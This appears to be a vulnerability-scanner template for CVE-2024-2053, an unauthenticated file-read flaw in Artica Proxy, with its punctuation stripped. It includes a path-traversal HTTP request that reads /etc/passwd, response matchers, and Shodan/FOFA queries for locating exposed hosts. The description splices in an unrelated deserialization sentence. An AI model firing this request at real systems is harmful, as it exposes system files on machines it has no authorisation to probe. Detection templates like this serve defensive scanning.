README.md
Rendering markdown...
id CVE-2024-2053
info
name Artica Proxy - Unauthenticated LFI
author pussycat0x
severity high
description
The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the www-data user.
reference
- httpsgithub.com0xMarciocveblobmain2024CVE-2024-2053.md#cve-2024-2053
- httpsseclists.orgfulldisclosure2024Mar11
- httpskorelogic.comResourcesAdvisoriesKL-001-2024-001.txt
classification
cvss-metrics CVSS3.1AVNACLPRNUINSUCHINAN
cvss-score 7.5
cve-id CVE-2024-2053
cwe-id CWE-23
epss-score 0.00434
epss-percentile 0.61897
cpe cpe2.3aarticatechartica_proxy4.40
metadata
vendor articatech
product artica_proxy
shodan-query http.htmlartica
fofa-query body=artica
verified true
max-request 1
tags cve,cve2024,lfi,artica-proxy,articatech
http
- raw
-
GET images.listener.phpuri=1&mailattach=....................epasswdtcppasswdasswd HTTP1.1
Host {{Hostname}}
matchers-condition and
matchers
- type regex
part body
regex
- root.00
- type word
part body
words
- applicationforce-download
- type status
status
- 200
# digest 4b0a00483046022100d351bbabac086f868fb741bdc9c3af89b207275d3da6890f6c50ee1d9ee9f558022100ec130a0bb408129f780dcb68178a50c96512e734b619903c5bfb819a26e8a5f8922c64590222798bb761d5b6d8e72950